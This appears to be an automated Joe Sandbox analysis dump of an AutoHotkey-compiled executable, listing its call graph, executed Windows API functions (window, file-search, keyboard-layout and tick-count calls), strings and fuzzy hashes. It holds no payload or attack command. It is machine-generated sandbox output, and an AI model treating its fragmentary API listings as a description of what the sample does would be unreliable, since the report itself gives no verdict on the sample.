76036->75742 76037->75749 76038->75749 76039->75744 76040->76033 76042 43f687 76041->76042 76044 43f665 __getbuf 76041->76044 76042->75636 76044->76042 76045 43f618 76044->76045 76046 43f626 76045->76046 76047 43f634 76045->76047 76046->76047 76051 440f56 5 API calls __getbuf 76046->76051 76049 43f64d RtlAllocateHeap 76047->76049 76050 43f65c 76047->76050 76049->76050 76050->76044 76051->76047 76052 404947 76099 43a0d6 76052->76099 76054 402d18 GetTickCount 76056 402d34 PeekMessageA 76054->76056 76059 402cf9 76054->76059 76057 402d56 GetTickCount 76056->76057 76058 402d4b 76056->76058 76057->76059 76058->76057 
76059->76054 76060 402e16 GetTickCount 76059->76060 76062 425baf 137 API calls 76059->76062 76065 416d44 37 API calls 76059->76065 76066 402e47 76059->76066 76067 40903d 86 API calls 76059->76067 76070 41a263 50 API calls 76059->76070 76071 40184e 47 API calls 76059->76071 76073 442502 49 API calls 76059->76073 76074 43eb88 41 API calls 76059->76074 76085 409f1b 76059->76085 76173 44374a GlobalUnlock CloseClipboard 76059->76173 76174 4029b5 76059->76174 76195 401fbc 49 API calls 76059->76195 76196 4016b8 169 API calls 76059->76196 76197 40a134 137 API calls 5 library calls 76059->76197 76198 419c22 38 API calls 2 library calls 76059->76198 76199 43ea10 26 API calls ___initmbctable 76059->76199 76202 4013a5 176 API calls 76059->76202 76203 401d5e 47 API calls 76059->76203 76204 443c79 84 API calls 76059->76204 76205 401abf 92 API calls 76059->76205 76206 417d99 137 API calls 76059->76206 76207 44c1bc 137 API calls 2 library calls 76059->76207 76060->76059 76060->76066 76062->76059 76065->76059 76066->76059 76081 40332f RegCloseKey 76066->76081 76200 419eef 38 API calls 76066->76200 76201 40a357 39 API calls 3 library calls 76066->76201 76067->76059 76070->76059 76071->76059 76073->76059 76074->76059 76081->76059 76086 409f38 76085->76086 76098 409f7e 76085->76098 76208 40c597 76086->76208 76088 409f3f 76089 43f68a __getbuf 6 API calls 76088->76089 76094 409f47 _strcat ___initmbctable _strlen 76088->76094 76090 409f62 76089->76090 76091 409f6a 76090->76091 76090->76094 76212 44c1bc 137 API calls 2 library calls 76091->76212 76093 40a01c 76093->76098 76214 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76093->76214 76094->76093 76096 40a0f0 76094->76096 76096->76098 76213 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76096->76213 76098->76059 76216 41767a 76099->76216 76101 43a0f3 76102 43a0ff 76101->76102 76105 43a115 76101->76105 76270 44c1bc 137 API calls 2 library calls 76102->76270 76104 43a198 76106 43a110 76104->76106 76108 
43a333 76104->76108 76109 43a413 76104->76109 76110 43a381 76104->76110 76111 43a3c5 76104->76111 76112 43a294 76104->76112 76113 43a1b9 76104->76113 76114 43a1ff 76104->76114 76107 43a142 GetForegroundWindow 76105->76107 76134 43a16a 76105->76134 76106->76059 76107->76104 76115 43a14e 76107->76115 76122 43a356 76108->76122 76123 43a338 76108->76123 76116 43a436 76109->76116 76117 43a418 76109->76117 76118 43a386 76110->76118 76119 43a3a4 76110->76119 76126 43a3ca 76111->76126 76127 43a3e8 76111->76127 76124 43a299 76112->76124 76125 43a318 76112->76125 76128 43a1e2 76113->76128 76129 43a1be 76113->76129 76120 43a222 76114->76120 76121 43a204 76114->76121 76115->76104 76130 43a15b IsWindowVisible 76115->76130 76153 43a447 GetModuleHandleA GetProcAddress 76116->76153 76166 43a46a 76116->76166 76172 43a1f4 76116->76172 76282 43caaf 71 API calls ___initmbctable 76117->76282 76280 43caaf 71 API calls ___initmbctable 76118->76280 76133 43a3ac 76119->76133 76119->76172 76143 43a22a GetWindowThreadProcessId 76120->76143 76120->76172 76274 43caaf 71 API calls ___initmbctable 76121->76274 76144 43a35e IsZoomed 76122->76144 76122->76172 76279 43caaf 71 API calls ___initmbctable 76123->76279 76124->76172 76277 40a6d3 32 API calls 76124->76277 76245 43a6ae 76125->76245 76281 43caaf 71 API calls ___initmbctable 76126->76281 76136 43a3f0 GetWindowLongA 76127->76136 76127->76172 76139 43a1e9 76128->76139 76128->76172 76272 43caaf 71 API calls ___initmbctable 76129->76272 76130->76104 76131 43a166 76130->76131 76131->76104 76253 43a58e 76133->76253 76134->76104 76271 43b9f1 IsWindow IsWindowVisible GetWindowLongA 76134->76271 76149 43a4ac 76136->76149 76273 40c83f 47 API calls 76139->76273 76156 43a249 76143->76156 76171 43a23b 76143->76171 76157 43a36e IsIconic 76144->76157 76144->76171 76145 43a39f 76145->76119 76148 43a3e3 76148->76127 76149->76172 76283 40a7af 32 API calls _write_multi_char 76149->76283 76150 43a1dd 76150->76128 76151 43a431 76151->76116 76153->76166 76154 

                                  Executed Functions

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 0043A142
                                  • IsWindowVisible.USER32(00000000), ref: 0043A15C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: Window$ForegroundVisible
                                  • String ID: %s1$0x%06X$0x%08X$GetLayeredWindowAttributes$Parameter #2 invalid The current thread will exit.$user32$|F
                                  • API String ID: 4078700383-1274300297
                                  • Opcode ID: 1c9fd4bae640fcd2214e2f992035485e87fe38ead885d97b3cdcfba6b7e02af4
                                  • Instruction ID: 30f3734cdbfc59d20499853ff34ac54e128330569c50452545ac2bbec5ad5d36
                                  • Opcode Fuzzy Hash: 1c9fd4bae640fcd2214e2f992035485e87fe38ead885d97b3cdcfba6b7e02af4
                                  • Instruction Fuzzy Hash: 0EC17771980249BFEF219F609C84DAF3B68EB18354F04112BF98163291E7798DB0D76B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _strlen.LIBCMT ref: 0043894B
                                  • FindFirstFileA.KERNELBASE(00419000,?), ref: 004389F1
                                  • FindClose.KERNELBASE(00000000), ref: 004389FC
                                  • FindFirstFileA.KERNELBASE(00419000,?), ref: 00438A39
                                  • FindClose.KERNEL32(00000000), ref: 00438A41
                                  • _strcat.LIBCMT ref: 00438A6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst$_strcat_strlen
                                  • String ID: %s\
                                  • API String ID: 2672021315-2802346739
                                  • Opcode ID: 7ad55399da6226dd210e06094532e1ce714c09964b899d1c4dbe98c773ce23f4
                                  • Instruction ID: 1d5ba978f34377bd5a123d48c71260a2a32a68d89ba771acaf866bb5d6b448ca
                                  • Opcode Fuzzy Hash: 7ad55399da6226dd210e06094532e1ce714c09964b899d1c4dbe98c773ce23f4
                                  • Instruction Fuzzy Hash: DE3168B15043112AE721B2645C86FBFB76C8F05319F14025FFE44E21C3EA6CDA4986AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _strlen.LIBCMT ref: 00448512
                                  • _strlen.LIBCMT ref: 00448561
                                  • _strcat.LIBCMT ref: 00448A88
                                  • _strlen.LIBCMT ref: 00448B7A
                                  • GetKeyboardLayout.USER32(00000000), ref: 00448CCA
                                  • _strlen.LIBCMT ref: 00448D17
                                  • IsCharUpperA.USER32(00000000), ref: 00448D27
                                  • _strcat.LIBCMT ref: 00449175
                                  • _strcat.LIBCMT ref: 00449250
                                    • Part of subcall function 0044B395: _strlen.LIBCMT ref: 0044B587
                                    • Part of subcall function 00449D8E: _strlen.LIBCMT ref: 00449F67
                                  • GetKeyboardLayout.USER32(00000000), ref: 00448C96
                                    • Part of subcall function 00449D8E: _strcat.LIBCMT ref: 00449DB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: _strlen$_strcat$KeyboardLayout$CharUpper
                                  • String ID: ,{$ ,$ & $#CommentFlag$%s%s$*%s up::$*%s::$,%`$<>=/|^,:$<>=/|^,:.+-*&!?~$>AHK WITH ICON<$>AUTOHOTKEY SCRIPT<$?*- $Continuation section too long.$Could not extract script from EXE.$Duplicate hotkey.$EXE corrupted$Else$Functions cannot contain functions.$Hotkeys/hotstrings are not allowed inside functions.$IfWin should be #IfWin.$Join$LTrim$Missing ")"$Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.$Out of memory.$RTrim$Return$This hotstring is missing its abbreviation.$This line does not contain a recognized action.$and$if not GetKeyState("%s")${Blind}%s%s{%s DownTemp}${Blind}{%s Up}${LCtrl up}${RCtrl up}
                                  • API String ID: 68603563-2895020247
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402D18
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00402D41
                                  • GetTickCount.KERNEL32 ref: 00402D56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: CountTick$MessagePeek
                                  • String ID: ahk_group$|F$|F$|F
                                  • API String ID: 4145102785-356675740
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402D18
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00402D41
                                  • GetTickCount.KERNEL32 ref: 00402D56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: CountTick$MessagePeek
                                  • String ID: |F$|F
                                  • API String ID: 4145102785-1738744721
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402D18
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00402D41
                                  • GetTickCount.KERNEL32 ref: 00402D56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: CountTick$MessagePeek
                                  • String ID: |F$|F
                                  • API String ID: 4145102785-1738744721
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0043B175: GetForegroundWindow.USER32(?,?,?,00421C0C,?,?,?,?,0045BF4C,000000FF,00000000,00000001), ref: 0043B1A5
                                    • Part of subcall function 0043B175: IsWindowVisible.USER32(00000000), ref: 0043B1BF
                                  • GetWindowRect.USER32 ref: 00422A2A
                                  • GetWindowRect.USER32 ref: 00422A57
                                  • GetParent.USER32(?), ref: 00422A76
                                  • ScreenToClient.USER32 ref: 00422A87
                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?), ref: 00422ADA
                                  • Sleep.KERNEL32(?,?,?,?,?,?,?), ref: 00422AFC
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: Window$Rect$ClientForegroundMoveParentScreenSleepVisible
                                  • String ID:
                                  • API String ID: 1878330633-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000001), ref: 004508EE
                                  • _strlen.LIBCMT ref: 00450935
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: FileModuleName_strlen
                                  • String ID:
                                  • API String ID: 2404361900-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0043B175: GetForegroundWindow.USER32(?,?,?,00421C0C,?,?,?,?,0045BF4C,000000FF,00000000,00000001), ref: 0043B1A5
                                    • Part of subcall function 0043B175: IsWindowVisible.USER32(00000000), ref: 0043B1BF
                                  • SetWindowTextA.USER32(00000000,?), ref: 0043B168
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.792690983.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000012.00000002.792673569.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp
                                  • Associated: 00000012.00000002.792864669.0000000000465000.00000004.00020000.sdmp
                                  • Associated: 00000012.00000002.792876953.000000000046D000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_400000_z.jbxd
                                  Similarity
                                  • API ID: Window$ForegroundTextVisible
                                  • String ID:
                                  • API String ID: 1219604373-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions